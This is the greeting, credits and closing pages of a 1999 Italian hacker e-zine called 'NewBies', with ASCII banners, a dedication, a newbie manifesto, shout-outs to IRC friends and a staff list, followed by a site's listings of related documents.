ºÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿º
º³
SALUTI
³º
ºÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙº
ÈÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍͼ
Dedico questa e-zine a K4m4l30nt3, colui con il quale ho iniziato questa
avventura e che ora non e' piu' tra noi.... dovunque tu sia questa e' per te
fratello
_--={ ø(^__^)ø }=--_
Io sono un newbies e questo e' il mio manifesto. Potete anche fermare me, ma
non potete fermarci tutti... dopo tutto, siamo tutti curiosi uguali e con la
stessa voglia di smanettare e di capire.
+++Illo N0bodY88+++ January 16, 1999
Ok ora voglio fare anche io un mega salutone a Dark Schnaider [ complimenti
x il sito ] , Biavo , w00w00 e tutti gli altri amici mirc che frequentemente
vengono sul nostro beneamato canale #hackernow [ grazie di tutto cuore siete
mitici ] . Ah mi dimenticavo una cosa .... Fanculo ai Lamer siete esseri
immondi .... Come sono buono eh..
Io sono un newbies e questo e' il mio manifesto. Potete anche fermare me, ma
almeno aspettate che abbia fermato tutti i lamer di questo universo, dopo
tutto non siamo tutti uguali
ZeroCool
ÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏ
_
_
____ _
| \ | | _____
_| __ )(_) ___ ___
| \| |/ _ \ \ /\ / / _ \| |/ _ Y __|
| |\ | __/\ V V /| |_) | | __|__ \
|_| \_|\___| \_/\_/ |____/|_|\___|___/
Webmaster by --------->
Redattori ------------>
E-zine by ------------>
Ascii by ------------->
Loghi NewBies by ----->
Articoli ------------->
ZeroCool & T0rment0 & _p0nic0_ & HaRLoK & N0bodY88
N0bodY88 & ZeroCool & Dante Alighieri
N0bodY88 & ZeroCool & NewBies Staff
N0bodY88 & |-|15cR4zYm1nD & S0l1t4r10~M4N & 1mGvD
RigoR MorteM
NewBies Staff & Friends
|-_-|-_-|-_-|-_-|-_-|-_-|-_-|-_-|-_-|-_-|-_-|-_-|-_-|-_-|-_-|-_-|-_-|-_-|-_-|Fine e-zine:
E anche questo numero e' giunto alla frutta quindi che dire...speriamo che vi
sia piaciuto...e ora un po' di cose...buon compleanno a Raffi Crash....un
grazie di cuore a drwxr-xr- x tutto il suo aiuto x NewBies e x la sua amicizia
dimostrata in vari modi...tnx in modo molto speciale sia a Yago il mito che a
RigoR MorteM che adesso mi ha pure trasmesso la passione x l'elettronica...
cax che figata raga...
N0bodY88

Documenti analoghi

Newbies 4

Newbies 4 The price that society as aol and cable inwiry offer are very good in this period we 've a price of 20USD for month for cable seven and about 80USD for aol service.. I know that some place in usa ...

Dettagli

COMPUTERISED MORSE CODE GENERATOR/TRANSMITTER

COMPUTERISED MORSE CODE GENERATOR/TRANSMITTER (NE555) is connected to an FM transmitter comprising transistor T2 (BF194B) and the associated components. The frequency of the transmitter can be changed with the help of trimmer capacitor VC1 or ...

Dettagli